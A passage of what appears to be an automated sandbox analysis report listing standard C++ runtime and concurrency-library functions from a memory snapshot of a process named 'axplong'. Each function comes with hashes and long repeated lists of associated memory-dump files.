                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 49fcf71f40cdee32d76cff0cfec7904b1821ee1dee631ce0987f33fef910e908
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DC513D71A00219ABDF08DF64C595BEDB7AEFF08344F0444ADE906AB781DB34AE45CB94
                                                                                                                                                                                                                                                    Function 006A51D5 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 308COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • IsInExceptionSpec.LIBVCRUNTIME ref: 006A52D0
                                                                                                                                                                                                                                                    • type_info::operator==.LIBVCRUNTIME ref: 006A52F7
                                                                                                                                                                                                                                                    • ___TypeMatch.LIBVCRUNTIME ref: 006A5403
                                                                                                                                                                                                                                                    • IsInExceptionSpec.LIBVCRUNTIME ref: 006A54DE
                                                                                                                                                                                                                                                    • CallUnexpected.LIBVCRUNTIME ref: 006A5580
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2969340543.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2968340684.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2969340543.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2971382670.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972824055.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972995057.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973272466.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973451814.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974370345.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974514769.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975244048.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975426934.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975731806.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975910248.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976096521.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976314394.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976562636.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976747778.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976960592.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977161488.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977372973.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977508510.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977623070.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977767242.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977884387.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978004177.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978117329.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978250820.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978393261.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978498832.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978633657.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978732631.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978862319.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979000956.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979086736.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979487943.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979598507.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979785467.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979832747.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979903922.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980027006.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980137595.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExceptionSpec$CallMatchTypeUnexpectedtype_info::operator==
                                                                                                                                                                                                                                                    • String ID: csm$csm$csm
                                                                                                                                                                                                                                                    • API String ID: 4162181273-393685449
                                                                                                                                                                                                                                                    • Opcode ID: d2b0d3b596c40e394ee3c43016989cbf529c4e4b01b4bd5c121bfccca8061c61
                                                                                                                                                                                                                                                    • Instruction ID: a199452545ae93211fc5c249c3e01e00d6b964810f9812ea38c058c9a9baf348
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d2b0d3b596c40e394ee3c43016989cbf529c4e4b01b4bd5c121bfccca8061c61
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4DC15971C00619AFCF15EFA4C881AEEBBB6BF5A310F04415AE8166B202D771DE51CFA5
                                                                                                                                                                                                                                                    Function 00697294 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 80COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 006972E0
                                                                                                                                                                                                                                                    • Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 00697322
                                                                                                                                                                                                                                                    • Concurrency::details::InternalContextBase::GetAndResetOversubscribedVProc.LIBCMT ref: 0069733E
                                                                                                                                                                                                                                                    • Concurrency::details::VirtualProcessor::MarkForRetirement.LIBCONCRT ref: 00697349
                                                                                                                                                                                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00697370
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2969340543.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2968340684.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2969340543.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2971382670.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972824055.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972995057.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973272466.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973451814.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974370345.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974514769.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975244048.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975426934.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975731806.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975910248.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976096521.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976314394.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976562636.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976747778.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976960592.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977161488.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977372973.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977508510.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977623070.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977767242.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977884387.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978004177.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978117329.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978250820.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978393261.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978498832.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978633657.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978732631.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978862319.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979000956.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979086736.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979487943.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979598507.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979785467.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979832747.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979903922.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980027006.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980137595.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Concurrency::details::$Virtual$FindMatchingNode::ProcessorScheduling$Base::ContextInternalMarkOversubscribedProcProcessor::ResetRetirementstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                    • String ID: count$ppVirtualProcessorRoots
                                                                                                                                                                                                                                                    • API String ID: 3897347962-3650809737
                                                                                                                                                                                                                                                    • Opcode ID: cf47f767e2fdd034e06ecff7e3bcc18f30b8863878d4baabd8713a66f3cfdfe5
                                                                                                                                                                                                                                                    • Instruction ID: 57e14c519dd0ed1f16ddce8da1d4ee7c486ff1f8fc52351f1e2a5bb60e302a4a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cf47f767e2fdd034e06ecff7e3bcc18f30b8863878d4baabd8713a66f3cfdfe5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3C216234A10209EFCF54EFA4C895AADB7BEFF49350F1040A9E901A7751CB31AE01DB54
                                                                                                                                                                                                                                                    Function 00697811 Relevance: 12.1, APIs: 8, Instructions: 106timeCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00697833
                                                                                                                                                                                                                                                      • Part of subcall function 00695BE8: __EH_prolog3_catch.LIBCMT ref: 00695BEF
                                                                                                                                                                                                                                                      • Part of subcall function 00695BE8: Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 00695C28
                                                                                                                                                                                                                                                    • Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 0069785A
                                                                                                                                                                                                                                                    • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00697866
                                                                                                                                                                                                                                                      • Part of subcall function 00695BE8: Concurrency::details::SchedulerBase::AddContext.LIBCONCRT ref: 00695CA0
                                                                                                                                                                                                                                                      • Part of subcall function 00695BE8: Concurrency::details::InternalContextBase::SpinUntilBlocked.LIBCMT ref: 00695CAE
                                                                                                                                                                                                                                                    • Concurrency::details::SchedulerBase::GetNextSchedulingRing.LIBCMT ref: 006978B2
                                                                                                                                                                                                                                                    • Concurrency::location::_Assign.LIBCMT ref: 006978D3
                                                                                                                                                                                                                                                    • Concurrency::details::SchedulerBase::StartupVirtualProcessor.LIBCONCRT ref: 006978DB
                                                                                                                                                                                                                                                    • Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 006978ED
                                                                                                                                                                                                                                                    • Concurrency::details::SchedulerBase::ChangeThrottlingTimer.LIBCONCRT ref: 0069791D
                                                                                                                                                                                                                                                      • Part of subcall function 0069684D: Concurrency::details::SchedulerBase::FoundAvailableVirtualProcessor.LIBCONCRT ref: 00696872
                                                                                                                                                                                                                                                      • Part of subcall function 0069684D: Concurrency::details::VirtualProcessor::ClaimTicket::ExerciseWith.LIBCMT ref: 00696895
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2969340543.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2968340684.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2969340543.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2971382670.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972824055.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972995057.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973272466.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973451814.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974370345.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974514769.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975244048.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975426934.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975731806.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975910248.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976096521.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976314394.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976562636.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976747778.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976960592.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977161488.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977372973.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977508510.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977623070.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977767242.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977884387.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978004177.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978117329.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978250820.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978393261.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978498832.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978633657.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978732631.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978862319.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979000956.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979086736.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979487943.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979598507.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979785467.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979832747.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979903922.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980027006.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980137595.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Concurrency::details::$Base::$Scheduler$ContextThrottling$InternalTimeVirtual$Processor$AssignAvailableBlockedChangeClaimConcurrency::location::_ExerciseFoundH_prolog3_catchNextProcessor::RingSchedulingSpinStartupTicket::TimerUntilWith
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1475861073-0
                                                                                                                                                                                                                                                    • Opcode ID: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
                                                                                                                                                                                                                                                    • Instruction ID: b27609185838a7fb7f64f0ca410b9c5de3e836a86b19ce070b1516d733847672
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 79312730B182556BCF56AB7844567FEB7BFAF41304F0404B9E486D7742DB254D0AC391
                                                                                                                                                                                                                                                    Function 006A4770 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 006A47A7
                                                                                                                                                                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 006A47AF
                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 006A4838
                                                                                                                                                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 006A4863
                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 006A48B8
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2969340543.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2968340684.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2969340543.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2971382670.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972824055.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972995057.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973272466.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973451814.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974370345.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974514769.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975244048.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975426934.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975731806.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975910248.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976096521.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976314394.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976562636.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976747778.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976960592.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977161488.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
